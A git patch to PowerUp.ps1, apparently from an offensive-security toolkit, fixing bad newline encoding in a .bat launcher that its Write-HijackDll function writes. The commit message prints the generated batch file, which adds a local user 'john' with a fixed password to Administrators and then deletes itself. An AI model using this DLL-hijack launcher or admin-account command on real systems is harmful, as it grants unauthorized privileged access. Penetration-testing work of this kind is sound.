From 9596f682744cf5c8bdcb67b6f2a18f5be94073e9 Mon Sep 17 00:00:00 2001
From: Jon Cave <jon.cave@mwrinfosecurity.com>
Date: Thu, 30 Jun 2016 10:12:27 +0200
Subject: PowerUp: Remove badly encoded new lines from .bat output

The current implementation results in a .bat like:

  @echo off\n
  start /b net user john Password123! /add && timeout /t 5 && net localgroup Administrators john /add\n
  start /b "" cmd /c del "%~f0"&exit /b

With literal "\n" strings at the end of the first two lines.

A new line in a PowerShell string should be "`n". However, an extra new
line isn't actually necessary in this case.
---
 Privesc/PowerUp.ps1 | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Privesc/PowerUp.ps1 b/Privesc/PowerUp.ps1
index 0b62245..2466975 100644
--- a/Privesc/PowerUp.ps1
+++ b/Privesc/PowerUp.ps1
@@ -2669,8 +2669,8 @@ function Write-HijackDll {
     # build the launcher .bat
     if (Test-Path $TargetBatPath) { Remove-Item -Force $TargetBatPath }
 
-    "@echo off\n" | Out-File -Encoding ASCII -Append $TargetBatPath
-    "start /b $BatCommand\n" | Out-File -Encoding ASCII -Append $TargetBatPath
+    "@echo off" | Out-File -Encoding ASCII -Append $TargetBatPath
+    "start /b $BatCommand" | Out-File -Encoding ASCII -Append $TargetBatPath
     'start /b "" cmd /c del "%~f0"&exit /b' | Out-File -Encoding ASCII -Append $TargetBatPath
 
     Write-Verbose ".bat launcher written to: $TargetBatPath"
-- 
cgit v1.2.3